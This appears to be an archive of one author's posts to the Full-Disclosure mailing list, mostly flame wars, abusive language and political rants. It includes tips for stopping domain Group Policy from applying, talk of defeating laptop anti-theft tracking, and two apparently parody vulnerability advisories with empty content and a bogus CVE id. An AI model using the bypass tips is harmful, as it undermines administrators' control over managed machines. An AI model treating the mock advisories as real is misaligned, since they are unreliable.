RE: [inbox] Re: [Full-disclosure] Full Disclosure Code of conduct

2006-05-06 Thread Exibar
well... sure sounds like n3td3v found another e-mail address to use

 -Original Message-
 From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
 Sent: Saturday, May 06, 2006 9:13 PM
 To: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]
 Subject: [inbox] Re: [Full-disclosure] Full Disclosure Code of conduct
 
 
 No selling of exploits and vulnerabilities?
 
 ahahahahaha... jesus fucking christ on a cross you are truly a dumb 
 cunt.  Guess I just fucked your other two rules didn't I.
 
 On Sat, 06 May 2006 18:01:20 -0700 Aaron Gray [EMAIL PROTECTED] 
 wrote:
 I am suggesting that we all cooperate and produce a Code of 
 Conduct for participating on the Full Disclosure mailing list.
 
 Suggested start :-
 
 1) No Swearing
 2) No slagging others off
 3) No selling of exploits and vulnerabilities
 
 Regards,
 
 Aaron
 
 
 


RE: [inbox] Re: [Full-disclosure] Full Disclosure Code of conduct

2006-05-06 Thread Exibar


 -Original Message-
 From: n3td3v [mailto:[EMAIL PROTECTED]
 Sent: Saturday, May 06, 2006 10:21 PM
 To: full-disclosure@lists.grok.org.uk
 Subject: [inbox] Re: [Full-disclosure] Full Disclosure Code of conduct


 On 5/7/06, Aaron Gray [EMAIL PROTECTED] wrote:
 
  I am suggesting that we all cooperate and produce a Code of Conduct for
  participating on the Full Disclosure mailing list.
 
  Suggested start :-
 
  1) No Swearing
  2) No slagging others off
  3) No selling of exploits and vulnerabilities
 

 Lets add:

 4) No Cross-site scripting and SQL injection advisories.

 We get the picture, there's 100 million flaws for
 guestbooks/bulletinboards and other unheard of vendor products. It's
 time to kill the cross-site scripting and sql injection spam created
 by copy & paste script kids. Let the lame Securityfocus Bugtraq
 mailing list get submitted with that B*S from now on.



Let's add:

5) no posts from N3td3v or 0x80   (even though this last post by n3td3v was
actually an acceptable post)



Re: [Full-disclosure] IE7 Zero Day

2006-05-05 Thread Exibar
I have a sure fire way to make your computer, ANY COMPUTER, YES ANY 
COMPUTER!!! 100% safe from hackers, spyware, viruses, and anything else 
malicious that you can think of.  yes it's true, I am not lying here.


  I work in an office by day, making barely enough to afford real tomato 
ketchup for my family's French Fries.  I will sell this procedure to the 
highest bidder that can prove to me that they will pay for this 
knowledge.


 WELCOME TO FullDisclosure-Bay!  Your auction site for vulnerabilities, 
exploits, and fixes!!!


 ROFL, I mean no disrespect man, just couldn't resist.  yah, I'm sure 
if you think about it a bit you'll realize what my procedure is.


 dude, there ARE places that will give you cold hard cash for your proven 
exploits, mind you I did say PROVEN  this really isn't the list to 
advertise selling exploits on though.


 Exibar

- Original Message - 
From: [EMAIL PROTECTED]

To: full-disclosure@lists.grok.org.uk
Sent: Thursday, May 04, 2006 7:46 PM
Subject: [Full-disclosure] IE7 Zero Day



Yes, this is a beta product but I have reason to believe that this
issue will not be discovered or fixed by M$ before it goes to gold.
Why do I believe this?  Because the issue is found in IE 6 but
doesn't seem to exploit.  Not saying it is not exploitable I am
saying that I can't make it exploit.

I work as a pizza delivery driver at night and work part time
landscaping in my days.  So I feel it is only fair that I be
compensated for this vulnerability.

Highest bidder that can convince me that you will actually pay
wins.





[Full-disclosure] bypassing Windows Domain Group Policy Objects

2006-04-27 Thread Exibar
I seem to recall a paper on the circumventing of Windows Domain GPO's, but I 
can't find it anywhere.


 anyone have any information on preventing GPO's from being applied to a 
Domain machine?  or a link to that paper?


thanks!
  Ex 




Re: [Full-disclosure] bypassing Windows Domain Group Policy Objects

2006-04-27 Thread Exibar


- Original Message - 
From: Michael Holstein [EMAIL PROTECTED]

To: full-disclosure@lists.grok.org.uk
Sent: Thursday, April 27, 2006 10:37 AM
Subject: Re: [Full-disclosure] bypassing Windows Domain Group Policy Objects


System Key: 
[HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System]

Value Name: DisableGPO
Data Type: REG_DWORD (DWORD Value)
Value Data: (0 = default, 1 = disable group policy)


strike that .. production releases ignore this.

Other possible solution, cripple gpupdate.exe (XP) or secedit.exe (2K) 
through permissions (eg: remove 'localsystem:execute'). Deleting them will 
just trigger WFP to replace.


/mike.




  H.  sounds like a good plan :-)   I'll test that out!   thanks!

 Ex 




RE: [inbox] Re: [Full-disclosure] Secunia illegal spam and advisory republication

2006-04-22 Thread Exibar
Hosted and sponsored by Secunia - http://secunia.com/

  I like it!

Hosted and sponsored by Secunia - http://secunia.com/

  I like Secunia

Hosted and sponsored by Secunia - http://secunia.com/

   I don't like you and your little games

Hosted and sponsored by Secunia - http://secunia.com/

   no-one likes you or your childish games

Hosted and sponsored by Secunia - http://secunia.com/

  Please leave this list and go back to your own worthless one

Hosted and sponsored by Secunia - http://secunia.com/

  What's your 8th grade teacher's feelings on what you're doing here?  

Hosted and sponsored by Secunia - http://secunia.com/


 -Original Message-
 From: n3td3v [mailto:[EMAIL PROTECTED]
 Sent: Friday, April 21, 2006 5:58 PM
 To: full-disclosure@lists.grok.org.uk
 Subject: [inbox] Re: [Full-disclosure] Secunia illegal spam and advisory
 republication
 
 
 On 4/21/06, John Cartwright [EMAIL PROTECTED] wrote:
  Hi
 
  Actually, the list has never been purchased by anyone. Len and I
  started things off using our own hardware, and when Len retired last
  year I solicited offers for hosting and support. Of the ~100 or so
  offers I received, Secunia made the most sense from a financial and
  technical point of view.
 
  For the record, Secunia staff have no access to the FD server and I
  continue to run it exclusively in an independent manner under a mutual
  agreement with Secunia.
 
  As far as the 'banner' text goes, I myself added that to reward
  Secunia for their generous support, for which I am extremely grateful.
 
  Cheers
  - John
 
 Hi,
 
 Remove the URL, no one wants it there. Secunia has no respect in the
 industry and probably never will. Their website is an eye sore, as is
 the Secunia URL on the footer message. How dare you allow FD to be
 hijacked by such a scene whore website, you never consulted the
 list of your plans to have FD taken over by professional scene whore
 cyber crooks. It is as much a comparison as allowing FD to be linked
 from Zone-H.org Who advised you out of your hundreds of offers to
 allow Secunia to be associated with the Full-Disclosure list? Perhaps
 you aren't intelligent enough to be making such decisions for the
 future of the list. Please pull away from Secunia and remove the URL,
 and partner up with a company which has respect in the industry,
 rather than Secunia, who are blackhats, as are Zone-H.
 
 Also: I'd like my xploitable_at_gmail account back.
 
 Cheers
 - n3td3v
 


Re: [Full-disclosure] Gary McKinnon

2006-04-14 Thread Exibar

agreed, if Pigs had wings, I'd be in lots and lots of trouble.
for that matter if a monkey all of a sudden shoots out my butt, I'd be in 
bigger trouble than the obvious
ok, lets take this a bit further, and go under the assumption that hell 
exists according to the myth of heaven and hell... and hell were to freeze 
over, there'd be lots of stuff that I'd have to do that isn't appealing.


Exibar


- Original Message - 
From: Dixon, Wayne [EMAIL PROTECTED]

To: Paul Schmehl [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
Sent: Friday, April 14, 2006 2:05 PM
Subject: RE: [Full-disclosure] Gary McKinnon


If Pigs have wings, there's a long list of things that I'd need to do.

Webguy


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Paul
Schmehl
Sent: Friday, April 14, 2006 12:59 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Gary McKinnon


[EMAIL PROTECTED] wrote:

On Thu, 13 Apr 2006 14:52:54 CDT, you said:


I don't understand they very same people who voted for that pig (GWB)


Keep in mind that less than half the registered voters voted for him.
And close to half of the people who *did* vote didn't vote for him.
If some of the non-voters who didn't like him *had* voted, he'd likely
not gotten back in office.


And if pigs had wings they could fly.

--
Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas http://www.utdallas.edu/ir/security/



Re: [Full-disclosure] Gary McKinnon

2006-04-14 Thread Exibar


sure sounds like he has prior knowledge of a terrorist cyber-attack to 
me.



- Original Message - 
From: Nobody Particular [EMAIL PROTECTED]

To: full-disclosure@lists.grok.org.uk
Sent: Friday, April 14, 2006 3:31 PM
Subject: Re: [Full-disclosure] Gary McKinnon



Ah, so you're stating you have prior knowledge of and involvement in a
Felony conspiracy?

n3td3v wrote:

Because theres going to be major cyber attacks next month if this
guy is sent to the United States.

On 4/14/06, joe haldon [EMAIL PROTECTED] wrote:

Why are people bringing politics into the mailing lists?




[Full-disclosure] !ADVISORY! + +Thu Mar 16 13:23:16 EST 2006+ + Integer Overflow in Snort

2006-03-16 Thread exibar



!ADVISORY! + +Thu Mar 16 13:23:16 EST 2006+ + Integer Overflow in Snort




==
I. BACKGROUND
There has had been no background.
==
II. WORKAROUND
This advisory had no identified workarounds on this issue.
==
APPENDIX A VENDOR INFORMATION
http://www.snort.org/

==
APPENDIX B REFERENCES
RFC 8484

==
CONTACT
Exibar [EMAIL PROTECTED]

CISSP GSAE CSFA SSP-CNSA SSP-MPA GHTQ SSCP 



[Full-disclosure] Advisory 2006-03-11 DoS Vulnerability in ISC OpenReg

2006-03-12 Thread Exibar
Advisory 2006-03-11 DoS Vulnerability in ISC OpenReg

I. BACKGROUND

Advisory marked for immediate release.

II. DESCRIPTION

Sending a specially crafted  malformed  packet to the services communication 
socket can create a loss of service.

III. HISTORY

This advisory has no history.

IV. WORKAROUND

There are no known workarounds.

V. VENDOR RESPONSE

ISC OpenReg has not commented on this issue.

VI. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2006-351360 to this issue.

APPENDIX A. - Vendor Information
http://www.isc.org/index.pl?/sw/openreg/
APPENDIX B. - References
NONE

CONTACT:
*Exibar [EMAIL PROTECTED]
*1-888-LOL-WHAT
*CISSP GSAE CCE CEH CSFA GREM SSP-CNSA SSP-MPA GIPS GHTQ GWAS




Re: [Full-disclosure] Urgent Alert: Possible BlackWorm DDay February3rd (Snort signatures included)

2006-01-24 Thread Exibar
this one also spreads via network shares, then creates an AT job that will
run itself on the 59th minute of every hour to further propagate.

  very worm like if you ask me.

  exibar


- Original Message - 
From: Dude VanWinkle [EMAIL PROTECTED]
To: Gadi Evron [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk;
bugtraq@securityfocus.com
Sent: Tuesday, January 24, 2006 1:52 PM
Subject: Re: [Full-disclosure] Urgent Alert: Possible BlackWorm DDay
February3rd (Snort signatures included)


On 1/24/06, Gadi Evron [EMAIL PROTECTED] wrote:

 now known as the TISF BlackWorm task force.

Why do you call a .scr you have to manually install a worm? Why not
BlackVirus

the worm moniker is very misleading (actually got me worried for a
sec). The email worm is also misleading, because it only propagates
through port 25, but that is not the point of entry. The point of
entry is the user running a visual basic script _willingly_.

Just so I know, what would you guys classify a real worm (blaster,
slammer, nimda, etc) as? Or would you just call it an internet worm
instead of an email worm and leave it at that?

thanks for the mis-info,

-JP
still love ja tho
-JP


Re: [Full-disclosure] Urgent Alert: Possible BlackWorm DDay February3rd (Snort signatures included)

2006-01-24 Thread Exibar
the payload gets executed at the time that it schedules itself to launch,
yes.  59 minutes after the hour.

 two payloads if you think about it:
   first payload creates the AT job to launch secondary harmful payload

Exibar


- Original Message - 
From: [EMAIL PROTECTED]
To: Exibar [EMAIL PROTECTED]; Dude VanWinkle
[EMAIL PROTECTED]; Gadi Evron [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk;
bugtraq@securityfocus.com
Sent: Tuesday, January 24, 2006 5:27 PM
Subject: Re: [Full-disclosure] Urgent Alert: Possible BlackWorm DDay
February3rd (Snort signatures included)


 Does the payload get executed once it has been copied to the
 network share?

 Mike

  this one also spreads via network shares, then creates an
  AT job that will run itself on the 59th minute of every
  hour to further propagate.
 
very worm like if you ask me.
 
exibar
 
 
  - Original Message -
  From: Dude VanWinkle [EMAIL PROTECTED]
  To: Gadi Evron [EMAIL PROTECTED]
  Cc: [EMAIL PROTECTED];
  full-disclosure@lists.grok.org.uk;
  bugtraq@securityfocus.com
  Sent: Tuesday, January 24, 2006 1:52 PM
  Subject: Re: [Full-disclosure] Urgent Alert: Possible BlackWorm DDay
  February3rd (Snort signatures included)
 
 
  On 1/24/06, Gadi Evron [EMAIL PROTECTED] wrote:
 
   now known as the TISF BlackWorm task force.
 
  Why do you call a .scr you have to manually install a
  worm? Why not BlackVirus
 
  the worm moniker is very misleading (actually got me
  worried for a sec). The email worm is also misleading,
  because it only propagates through port 25, but that is
  not the point of entry. The point of entry is the user
  running a visual basic script _willingly_.
 
  Just so I know, what would you guys classify a real worm
  (blaster, slammer, nimda, etc) as? Or would you just call
  it an internet worm instead of an email worm and leave
  it at that?
 
  thanks for the mis-info,
 
  -JP
  still love ja tho
  -JP


Re: [Full-disclosure] Vulnerability/Penetration Testing Tools

2006-01-19 Thread Exibar
use core-Impact.  'nuff said :-)


- Original Message - 
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]; [EMAIL PROTECTED];
full-disclosure@lists.grok.org.uk
Sent: Thursday, January 19, 2006 1:27 PM
Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools


 Madison,
  See, that's the challenge. I am not looking for a tool that does
 strict vulnerability assessments. I am looking for a tool that will do
 an automated vulnerability assessment and then automated attacks
 against those vulnerabilities. Core Impact has such a tool and it is
 well worth the money. In fact, I already have that in my to-purchase
 list. I am now searching for free tools however and haven't found
 anything.

  My goal is to identify tools that have a high ROI... free == the
 highest. Nevertheless, automation can only be used a limited amount as
 it reduces quality and accuracy; I know this.


 -Adriel

 -Original Message-
 From: Madison, Marc [EMAIL PROTECTED]
 To: H D Moore [EMAIL PROTECTED];
 full-disclosure@lists.grok.org.uk
 Sent: Wed, 18 Jan 2006 08:02:59 -0600
 Subject: RE: [Full-disclosure] Vulnerability/Penetration Testing Tools

   I've looked at BidiBLAH (enfaces on the BLAH).  Their product does
 nothing more than take the results from
 Nessus, Metasploit and such, then cram them all together in an easy to
 understand format for your boss.
 BidiBLAH IMHO is not a vulnerability assessment tool, rather a reporting
 tool.  If anyone can correct me
 please do, since at one point I was in contact with BidiBLAH sales
 asking what I got for $10,000.00 outside
 of the reporting?  Their answer, well let's just say I'm still waiting.

 My two cents, Nessus.  It's cheap, effective, and probably the most
 supported network vulnerability assessment
 tool on the market.




 H D Moore wrote:

 Er, woops, misread - you want to scan and automatically exploit
 systems.
 This can be easily done with a little scripting and the available
 open-source tools. SensePost
 has a project called BiDiBLAH that integrates Google-discovery, a TCP
 port scanner, Nessus,
 and Metasploit: - http://www.sensepost.com/research/bidiblah/

 The next version of the Metasploit Framework (v3) has support for
 'recon'
 modules that technically you could use to automate this, but it will
 take some time before this is usable.

 -HD


 On Tuesday 17 January 2006 18:04, H D Moore wrote:
  You should check out the Metasploit Framework:
   - http://metasploit.com/projects/Framework/



[Full-disclosure] you can now be arrested for being annoying on the 'net

2006-01-09 Thread Exibar
I'll let everyone wonder who would be the first on this list to be arrested
under this new law...

http://www.schneier.com/blog/archives/2006/01/anonymous_inter.html

Ex



Re: [Full-disclosure] infosecbofh

2006-01-06 Thread Exibar
It would be a benefit to everyone if this joker was kicked from the list.
I've never seen anyone else use so much foul language on this list before.
It's really a shame to have to kick someone from the list

oh wait, it WOULD BE a shame to kick someone that actually contributed
useful stuff to the list, in the case of this guy no loss...

  Ex


- Original Message - 
From: InfoSecBOFH [EMAIL PROTECTED]
To: Joe Average [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk
Sent: Friday, January 06, 2006 12:58 AM
Subject: Re: [Full-disclosure] infosecbofh


Oh here we go again... n3td3v jumps into the circle jerk.

Once again proving you know nothing of what you are talking about.
The load I left on your mom's chin contained more exploit code than
you and your dumb ass split personality could ever come up with.

Don't you have some 1337 XSS holes to find?

On 1/5/06, Joe Average [EMAIL PROTECTED] wrote:
 I guess he got bored of turning netdev into public enemy number one, to
 divert attention away from the real guy who is messing up the list, none
 other than the guy who has never released any security vulnerabilities... I
 present to you...mr infosecbofh...round of applause!


 On 1/5/06, Frank de Wit [EMAIL PROTECTED] wrote:
  infosecbofh: in your last TEN mails you contributed only negativity,
  foul language, bashing other users on this list, calling names etc etc
  i really don't see that as a positive contribution to this list or a
  useful contribution to the security community...
  you might be right in everything you say, but do you really think people
  listen and believe you if you write it down the way you do ?
  please start 2006 a better way and think and act more positive, please...


Re: [Full-disclosure] HR Block Tax Service sends mail with SSN on thelabel.

2006-01-01 Thread Exibar
limited to you alone...  sure, all it takes is for one person to figure
out how many digits into this source code that the SSN begins, and there you
go.  Not exactly rocket science there...

  Exibar

- Original Message - 
From: Troy Solo [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Cc: [EMAIL PROTECTED]
Sent: Sunday, January 01, 2006 12:55 PM
Subject: [Full-disclosure] HR Block Tax Service sends mail with SSN on
thelabel.


 My wife received this snail mail letter yesterday:

 Recently we mailed you a free copy of our TaxCut software.  We believe
 that this complimentary software will meet your 2006 tax preparation
 needs, based on our prior experience with you as an HR Block client.
 We hope that you will try TaxCut and find it to be a great solution for
 filing your next tax return.

 However, since we sent you this CD, we have become aware of a mail
 production situation that has affected a small percentage of recipients,
 including you.  Due to human error in developing the mailing list, the
 digits of your social security number (SSN) were used as part of your
 mailing label's source code, a string of more than 40 numbers and
 characters.  Fortunately, these digits were embedded in the middle of
 the string, and they were not formatted in any manner that would
 identify them as an SSN.

 Nevertheless, we sincerely apologize for this inadvertent error, which
 is completely inconsistent with our strict policies to protect our
 clients' privacy.  Our internal policies limit the use of client SSNs
 for purposes other than tax preparation.  Furthermore, our internal
 procedures require that mailing source codes are formulated in a manner
 that excludes use of any sensitive or confidential information.  Please
 know that we have conducted a thorough internal review of this matter,
 and are taking actions to ensure this does not re-occur.

 Again, please understand that the digits of your SSN were embedded in
 the middle of a lengthy source code, and they were not formatted in a
 manner that identifies them as an SSN.  As a result, we believe that
 exposure of your SSN digits was limited to you alone, since you are the
 only person who would recognize their significance.  Nonetheless, we
 suggest that you destroy the wrapper and mailing label of the free
 TaxCut CD we sent you.  If you would like more information about this
 incident, please visit www.taxcut.com/answers, a special Website that
 contains additional details and an e-mail link for contacting us with
 your questions.

 On behalf of more than 100,000 associates of HR Block, allow me to
 apologize for this unfortunate situation.  Through 50 tax seasons, HR
 Block has earned a reputation as a valued, trustworthy ally to our
 clients, and we sincerely hope that you will find the free TaxCut CD and
 our information packed taxcut.com Website to be helpful tools for the
 2006 tax filing season.

 Sincerely,

 Tom Allanson
 Senior Vice President  General Manager
 HR Block Digital Tax Solutions

 4400 Main Street Kansas City, MO 64111
 www.taxcut.com

 -

 The part about the exposure of the SSN was limited to you alone because
 you are the only person who would recognize your number kills me.

 -- 
 /*
 /*  Troy Solo
 /*  [EMAIL PROTECTED]
 /*  Si Hoc Legere Scis Nimium Eruditionis Habes
 /*



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
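
A pre-mailing check for the failure described in this thread, as an added example that is not part of the original posts: it scans each generated label source code for the recipient's own SSN digits and tallies the offsets at which they appear. The record layout, function names and sample values are assumptions, and the sample data is constructed.

```python
import re
from collections import Counter


def digits(s):
    """Strip everything except decimal digits."""
    return re.sub(r"\D", "", s)


def find_ssn(source_code, ssn):
    """Look for a record's SSN inside its own label source code.

    Returns ("contiguous", offset) when the nine digits appear as one run,
    ("interleaved", None) when they only appear once separators or letters
    are stripped (a conservative check that can over-report), or None.
    """
    want = digits(ssn)
    if len(want) != 9:
        raise ValueError("SSN must contain exactly nine digits")
    pos = source_code.find(want)
    if pos != -1:
        return ("contiguous", pos)
    if want in digits(source_code):
        return ("interleaved", None)
    return None


def audit_batch(records):
    """Audit (record_id, ssn, source_code) tuples before labels are printed.

    Returns (leaks, offsets): leaks is a list of (record_id, kind, offset);
    offsets counts how many leaking labels share each offset. One dominant
    offset means the position is fixed by the label generator, so a reader
    who learns it from a single label knows where to look on every label.
    """
    leaks = []
    offsets = Counter()
    for record_id, ssn, code in records:
        hit = find_ssn(code, ssn)
        if hit is None:
            continue
        kind, pos = hit
        leaks.append((record_id, kind, pos))
        if pos is not None:
            offsets[pos] += 1
    return leaks, offsets


# Constructed sample data. The SSNs use area 000, which is never issued.
PREFIX = "TXC2006KCMO64111"      # 16 characters, hypothetical campaign prefix
SUFFIX = "ZPLUS4B0917CD00"       # hypothetical routing suffix
SAMPLE = [
    ("A", "000-12-3456", PREFIX + "A" + "000123456" + SUFFIX + "A7"),
    ("B", "000-98-7654", PREFIX + "B" + "000987654" + SUFFIX + "B2"),
    ("C", "000-55-1212", PREFIX + "C" + "CUST00481" + SUFFIX + "C9"),
    ("D", "000-44-0001", PREFIX + "D" + "000-44-0001" + SUFFIX + "D5"),
]


if __name__ == "__main__":
    leaks, offsets = audit_batch(SAMPLE)
    for record_id, kind, pos in leaks:
        print(f"record {record_id}: SSN digits present ({kind}, offset {pos})")
    for pos, count in offsets.most_common():
        print(f"offset {pos}: {count} leaking label(s)")
```
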


Re: [Full-disclosure][WAY OFF TOPIC] complaints about the governemntspying!

2005-12-29 Thread Exibar



I am sick and tired of posts like this. I don't see anyone else's
government doing a damn thing about it, at least we're friggin DOING
SOMETHING. While other countries sit blindly on their rear-ends... Ok,
that's not entirely fair, UK is helping and so are a few others, you know
what would happen if we all pulled out? Chaos... total chaos.
I don't care if we attacked Iraq because Saddam has hemorrhoids on his
asshole... He was a cold blooded killer and deserves what he'll get in
trial... someone had to have the balls to stand up and bring him to
justice.

If you're not happy with the war in Iraq tell someone who really friggin
cares, if you're not happy with your country move the freak out or change
it, if you're not happy with my country, tell someone who cares, and stay
the freak out of it... oh and while you're at it, stop watching any movie
that is made here, stop eating McDonalds, BurgerKing, stop using our
products... if you don't like us why use anything that was made here or by
an American

Don't bother replying on list, or at all really, I'll not pollute this
list worse than this one message on this subject and won't get pulled into
a "my country is better than your country" argument either.

Exibar

  - Original Message -
  From: zap zoid
  To: Paul Schmehl
  Cc: full-disclosure@lists.grok.org.uk
  Sent: Thursday, December 29, 2005 7:59 PM
  Subject: Re: [Full-disclosure][WAY OFF TOPIC] complaints about the
  governemntspying!

  Since when did Iraq have terrorists? I thought you guys were going in to
  rid them of weapons of mass instruction. After nearly 16 years and your
  government still has yet to find these so called weapons. I have more
  mitre listings than Iraq has weapons of Mass instruction --tada

  On 12/29/05, Paul Schmehl [EMAIL PROTECTED] wrote:

  --On December 29, 2005 11:21:09 PM +0100 fok yo [EMAIL PROTECTED] wrote:

  Hey Paul! What do you think about obeying the list charter and at least
  try to tie your degenerate apologist misrepresentations of the world
  into information security somehow?

  APPLAUS/ Can't but second this.

  Interesting charter. Folks can blather on and on about how bad the US
  is, how evil Bush is, make all sorts of outrageous, unsupportable
  claims, but the first time someone calls them on it, we cry, "Wah, wah,
  you're not obeying the charter!"

  I understand you guys like to spew this crap unimpeded. I just enjoy
  throwing a monkey wrench in the works every now and then. Don't like it?
  Then shut up and go back to discussing security issues.

  Paul Schmehl ([EMAIL PROTECTED])
  Adjunct Information Security Officer
  University of Texas at Dallas
  AVIEN Founding Member
  http://www.utdallas.edu/

RE: [inbox] [Full-disclosure] Breaking LoJack for Laptops

2005-12-27 Thread Exibar
in another life, I played with the computrace software.  If I remember
correctly it transmits its data before the OS fully boots, and it is
supposed to survive a Ghost re-image or an OS re-install.  I believe it
hooks the Floppy controller if I remember correctly.  If the floppy wasn't
set to boot from first, the software was defeated.  The process that you
mentioned, if killed, won't stop the phone home process at boot time.  Throw
a sniffer on a spanned port on your switch and sniff the traffic coming from
your laptop's port and you'll see the computrace packets go out before the
laptop is booted.

   Now, this was about 5 years ago, I mentioned to them that they should have
hooks from the BIOS itself, that would invoke their code to phone home.  A
hook in the BIOS would be the only sure way to catch a stolen laptop, if the
stolen laptop is plugged into a phone line or network jack that is.

   They said, yes 5 years ago now, that they were working with Dell to get
hooks in the Dell bios.  Not sure if this ever happened or not...

   Exibar

 -Original Message-
 From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
 Sent: Saturday, December 24, 2005 10:06 AM
 To: full-disclosure@lists.grok.org.uk
 Subject: [inbox] [Full-disclosure] Breaking LoJack for Laptops


 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 Breaking Computrace’s Lo Jack for Laptops
 J. Oquendo
 [EMAIL PROTECTED] :: Can you hear me now?
 12/24/05


 After my company spent a pretty penny purchasing this Absolute’s
 Computrace “Lojack for Laptops” product, I decided to write up a
 How-To Defeat LoJack For Laptops article. Why? Why not? Maybe the
 vendor can step it up a notch and create something that actually
 functions without flaw. This is not to say the product doesn't work
 to some capacity, this article tends to solely clarify what this
 product is and how simple it is to disable it.

 Here is Absolute's advertisement:

 LAPTOP SECURITY PREVENTS LAPTOP THEFT.

 Computrace is laptop security and tracking software which deters
 laptop theft and recovers stolen computers – guaranteed. Absolute
 also provides software inventory, computer inventory, PC inventory,
 PC audits, IT asset management, asset tracking, software license
 management, and data security tools and services.

 I'd like to know how their product prevents laptop theft or even
 minimizes it. The ad is humorous. For the company to guarantee they
 can deter theft is another oddity. For starters there are no
 markings on my own laptop that state Protected by Absolute or
 anything similar. Even if there were, I highly doubt - that even if
 there were markings on my laptop - that would stop someone from
 picking up my machine and taking off with it. Secondly to state
 they can recover my laptop is even stranger. Lastly, someone might
 confuse Absolute with Absolut and snicker at it. To date my laptop
 has not called in for about sixty plus days. Should I call
 Absolute and put them to the test? The outcome would be nothing
 more than a refund for Computrace. Data? Laptop? Sayonara.

 So here is what Computrace is; it is nothing more than a piece of
 software that details what your machine is, and reports this data
 back to the Absolute website. This is some of the information the
 reporting contains for some of those machines running this
 gimmick:

 Call Tracking Information (for my own laptop)
 Computrace Agent first installed on (first call): 11/10/2005 9:06:38 AM
 Computrace Agent version: 814
 Computrace Agent last called on: 11/13/2005 2:20:17 PM
 Computrace Agent last called from: 192.168.0.1
 Computrace Agent next call scheduled for: 11/14/2005 2:50:17 PM
 Asset tracking data last collected on: 11/13/2005 2:20:17 PM

 MY_USERNAME
 MY_LAPTOP_NAME
 Assig. Username:
 Make: Dell Computer
 Model: INSPIRON_6000  Serial# XXX
 Asset# 11/13/2005 2:20:17 PM  814 Active

 Today is December 24th 2005. Prior to the 11/10 date, I had the
 program installed and disabled it without any notice for
 approximately 64 days, then reinstalled it for testing purposes.
 Obviously had I stolen this laptop, Absolute wouldn't be able to do
 anything about it. They don’t know where it’s at. At least they let
 me know something was cooking:
 Dear Customer Center User:


 This is an automatic e-mail notification generated by the Customer
 Center alerting system.

 Please visit https://www.Absolute.com/public/secure/login.asp to
 investigate your new alert.

 The following alert(s) configured for your account have been
 triggered:

 * Alert Name: Last called 20 days ago
 * Description: Pre-defined alert - if you don't wish to use this
 alert, leave it in a suspended status (note that it will be
 recreated in a suspended status if deleted)
 * Alert Type: Automatic Reset in 10 days
 * Alert Condition: Last Call Time - Greater or Equal To - 20 day(s)
 since last call
 * Detected

RE: [inbox] Re: [Full-disclosure] Good reasons for securing your website

2005-12-27 Thread Exibar



shit! I missed the picture! :-(

can any thoughtful person send it to me please? 


Ex

  -Original Message-
  From: Will Image [mailto:[EMAIL PROTECTED]
  Sent: Tuesday, December 27, 2005 1:18 PM
  To: [EMAIL PROTECTED]; rich erich; full-disclosure@lists.grok.org.uk
  Subject: [inbox] Re: [Full-disclosure] Good reasons for securing your
  website

  aww did i miss the fun?

  [EMAIL PROTECTED] wrote:

  and a very merry christmas to you. Love those New England Lassie's.

  b

  -- Original message --
  From: rich erich [EMAIL PROTECTED]
  To: full-disclosure@lists.grok.org.uk
  Subject: [Full-disclosure] Good reasons for securing your website
  Date: Tue, 27 Dec 2005 17:10:19 +

  http://www.mvimortgage.net/

  apparently you should watch what and where you put pictures or your
  friends. as this company is now finding out “pron” pictures of your
  girls should not be posted on your company public website even if you
  think they are in a hidden directory. especially if your company is a
  mortgage company and not playboy.

  http://www.mvimortgage.net/

  And they might not want to keep e-mail addresses of that said person
  where you can find them.

  [EMAIL PROTECTED]
  [EMAIL PROTECTED]

Re: [Full-disclosure] I never said Moreover Robert Lemos

2005-12-27 Thread Exibar

   You have to remember who he's being called a f*ckbag by


- Original Message - 
From: Paul [EMAIL PROTECTED]
To: 'InfoSecBOFH' [EMAIL PROTECTED]; 'Stan Bubrouski'
[EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk
Sent: Wednesday, December 28, 2005 1:36 AM
Subject: RE: [Full-disclosure] I never said Moreover Robert Lemos


 I don't want to get involved in the childish bickering, but in Lemos'
 defense, I don't find him to be very much of a fuckbag. He interviewed me
 once for a story and was very kind and courteous.

 Kind regards,
 Paul
 Greyhats Security
 http://greyhatsecurity.org

 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On Behalf Of
InfoSecBOFH
 Sent: Wednesday, December 28, 2005 12:05 AM
 To: Stan Bubrouski
 Cc: full-disclosure@lists.grok.org.uk
 Subject: Re: [Full-disclosure] I never said Moreover Robert Lemos

 In his defence.  Lemos is kind of a fuckbag

 On 12/27/05, Stan Bubrouski [EMAIL PROTECTED] wrote:
  What does Robert Lemos saying Moreover have anything to do with security?
  And what is your obsession with slandering and discrediting people who
  actually have jobs and accomplished more than copied and pasted
  e-mails like you anyways.
 
  Moreover, you are n3td3v.
 
  -sb
 
 
 
  On 12/27/05, Joe Average [EMAIL PROTECTED] wrote:
   I am not a Security Journalist who has said Moreover for the last 20
   years, how dare you say such a thing!

   Securityfocus.com and News.com have such a good reputation for not saying
   Moreover

   Results 1 - 10 of about 29,100 for robert lemos moreover . (0.04 seconds)
  
   http://www.google.com/search?q=robert+lemos+moreover


Re: [Full-disclosure] A CALL FOR FULL-DISCLOSURE TO BECOME AMODERATED LIST

2005-12-16 Thread Exibar



Problem is very simple to solve

Send any message from Infosecbofh and n3td3v to the trash or at least,
don't feed the trolls, they go away if no-one plays with them...

 Exibar

  - Original Message -
  From: Joe Average
